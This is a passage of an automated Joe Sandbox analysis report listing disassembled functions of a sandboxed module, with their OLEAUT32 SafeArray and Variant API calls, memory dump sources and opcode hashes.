                                                                                                            • Part of subcall function 6F0469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F046A41
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                            • Part of subcall function 6F03DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F03DFF6
                                                                                                            • Part of subcall function 6F03DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F03E003
                                                                                                            • Part of subcall function 6F03DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F03E02F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                                                                          • String ID:
                                                                                                          • API String ID: 959723449-0
                                                                                                          • Opcode ID: 493a0c87f79095fd379438d56f8b66cb01de371deb2942efa01b3c6a1f8e384d
                                                                                                          • Instruction ID: b25e8136fde8c3855618c4d694f43ad561d1e4a69496eb7d5eb7bfe2a7461798
                                                                                                          • Opcode Fuzzy Hash: 493a0c87f79095fd379438d56f8b66cb01de371deb2942efa01b3c6a1f8e384d
                                                                                                          • Instruction Fuzzy Hash: 70C16174A04205EFDB10DF68CC90F9DB7BABF85308F6045A9E919EB286DB75E940CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F044170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F0441AF
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F0441B5
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0441C0
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F0441F5
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044201
                                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6F044450
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04446D
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04447D
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044483
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 1774866819-0
                                                                                                          • Opcode ID: e4d8716ed9e8d0be754c7210ea90f67462503ec3a48478714415f1eb9ddf0197
                                                                                                          • Instruction ID: 8d0a8f1523606a6da165a21486f29f3b055c797d256e2f93db429bdde30edece
                                                                                                          • Opcode Fuzzy Hash: e4d8716ed9e8d0be754c7210ea90f67462503ec3a48478714415f1eb9ddf0197
                                                                                                          • Instruction Fuzzy Hash: 51B12775600609AFCB14DF98C884EEEB7F5BF8D310F158568E90AAB795DA34F841CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04C850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04C88F
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04C895
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F04C8A0
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F04C8D5
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04C8E1
                                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6F04CB1C
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04CB39
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04CB49
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04CB4F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 1774866819-0
                                                                                                          • Opcode ID: 27db62e04a11796ee272117e22c6b8cd94a6434cbbcf970d8bc9ccaacb1076bc
                                                                                                          • Instruction ID: d238de5e32fc719e9dcf6696ee4ae1d143a3ee620b303b5b5f240459c67123ad
                                                                                                          • Opcode Fuzzy Hash: 27db62e04a11796ee272117e22c6b8cd94a6434cbbcf970d8bc9ccaacb1076bc
                                                                                                          • Instruction Fuzzy Hash: ACB14875600609EFCB14DF98C884EAEB7F5BF8D310F14856CE506ABBA1CA34B841CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04C530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04C56F
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F04C575
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F04C580
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F04C5B5
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04C5C1
                                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6F04C7D4
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04C7F1
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04C801
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04C807
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 1774866819-0
                                                                                                          • Opcode ID: d9d04b43636bba5f60cc32fbe29dccc6688ace5e2a9d7bbc255034706bfa0dca
                                                                                                          • Instruction ID: 6c5b0bbc4095c7fc2e624a4c705fb7411572f16db4624b7f9a0276e1e3f1189a
                                                                                                          • Opcode Fuzzy Hash: d9d04b43636bba5f60cc32fbe29dccc6688ace5e2a9d7bbc255034706bfa0dca
                                                                                                          • Instruction Fuzzy Hash: E4A12875A00609EFCB14DF98C884EAEB7F9BF8D310F158569E506AB791DA34B841CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F043F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F043F7B
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F043F8D
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F043FB7
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F043FD0
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F0440C9
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044105
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F044123
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044157
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F044168
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
                                                                                                          • String ID:
                                                                                                          • API String ID: 758290628-0
                                                                                                          • Opcode ID: 1137454b9c466dfb59433842b6eca6f5a13bb2052876b4ad217f2a3ffb403004
                                                                                                          • Instruction ID: e862ff1a80a73f9528ca2a3f09e3214e24f063d9cec1db88be3ae89ea886ff52
                                                                                                          • Opcode Fuzzy Hash: 1137454b9c466dfb59433842b6eca6f5a13bb2052876b4ad217f2a3ffb403004
                                                                                                          • Instruction Fuzzy Hash: 29717B7A208781EFC700DF68C8C4A5BBBE4BB99314F144A2DFA95C7261C735E945CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F046880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F0468B2
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F0468BD
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F0468D7
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F0468FD
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F046909
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F046923
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F046981
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F04699E
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F0469A4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 3529038988-0
                                                                                                          • Opcode ID: aa0464f955271cb9ac0d2e5dfc9e331540bc354530a2513ab01c85b8176b5cf5
                                                                                                          • Instruction ID: 8632873cd232b13aef43cd1291d32d38d1fda18942a3514b627815fbe4bf5316
                                                                                                          • Opcode Fuzzy Hash: aa0464f955271cb9ac0d2e5dfc9e331540bc354530a2513ab01c85b8176b5cf5
                                                                                                          • Instruction Fuzzy Hash: C04181B6900609EFDB00DFA5C844BDEFBB8FF99310F14411AE905A7250E771A901CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03C020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2610073882-0
                                                                                                          • Opcode ID: 9a4c5c877e92be96fed8b7865f75517fd6d8cac116dfff94c441e9c11255592a
                                                                                                          • Instruction ID: 7a90054e976fc9719615200cde9210b0f4cae08e8b609974eb8c5970c9667b34
                                                                                                          • Opcode Fuzzy Hash: 9a4c5c877e92be96fed8b7865f75517fd6d8cac116dfff94c441e9c11255592a
                                                                                                          • Instruction Fuzzy Hash: 50C14672A087229FC300DF68C980E5AB7E5BFC9304F248A4DE599DB365D735E845CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0316B0 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 487COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6F031B53
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F031B5D
                                                                                                          • std::exception::exception.LIBCMT ref: 6F031C43
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F031C58
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
                                                                                                          • String ID: 0Bo$invalid vector<T> subscript
                                                                                                          • API String ID: 3098024973-162919122
                                                                                                          • Opcode ID: efb9096bd877bdfbac95a3cb8f715cc2ed9b39925937ddbc8124a0bd478958b4
                                                                                                          • Instruction ID: 452f2816d53d78285a30b85602f398a0f1e87463f894df60a8b395c6da8e558f
                                                                                                          • Opcode Fuzzy Hash: efb9096bd877bdfbac95a3cb8f715cc2ed9b39925937ddbc8124a0bd478958b4
                                                                                                          • Instruction Fuzzy Hash: C5221E76C0071ADFCB14CFA4C480ADEBBF5BF48314F11865ED456AB294E774AA88CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F046B10 Relevance: 9.4, APIs: 6, Instructions: 364COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6F046C8B
                                                                                                          • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6F046CA6
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6F046CC7
                                                                                                            • Part of subcall function 6F045760: std::tr1::_Xweak.LIBCPMT ref: 6F045769
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F046CF9
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F046F13
                                                                                                          • InterlockedCompareExchange.KERNEL32(6F0CC6A4,45524548,4B4F4F4C), ref: 6F046F34
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 2722669376-0
                                                                                                          • Opcode ID: 31e05a942327819c871d6627d31faca8d5b4c142490cb44ae4432e270d825972
                                                                                                          • Instruction ID: 7867290b8b51a855e59374aebff0a3b2b52394c330f000abe2011e2ad840b431
                                                                                                          • Opcode Fuzzy Hash: 31e05a942327819c871d6627d31faca8d5b4c142490cb44ae4432e270d825972
                                                                                                          • Instruction Fuzzy Hash: FFD1D1B5A00209DFDB10CFA8C980BAEB7F9BF46314F148579E555AB2D1E775E800CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F048F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE63
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE73
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE86
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AE99
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEAC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04AEBF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 4225690600-0
                                                                                                          • Opcode ID: cece33eb77b8af89a3a857a902e3c58bed358fe8bef817d612382dc6e80a847a
                                                                                                          • Instruction ID: 95833a12193d2af91014fd04f0978240bfb999fbc3e38881c01e8191321a8324
                                                                                                          • Opcode Fuzzy Hash: cece33eb77b8af89a3a857a902e3c58bed358fe8bef817d612382dc6e80a847a
                                                                                                          • Instruction Fuzzy Hash: C1313770A00618DFCB10DFA9CC80B9EB7FABF85200F2086AAE429E7241C771E9418F50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F051FD0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 175COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F052206
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F052221
                                                                                                            • Part of subcall function 6F056480: __CxxThrowException@8.LIBCMT ref: 6F056518
                                                                                                            • Part of subcall function 6F056480: __CxxThrowException@8.LIBCMT ref: 6F056558
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
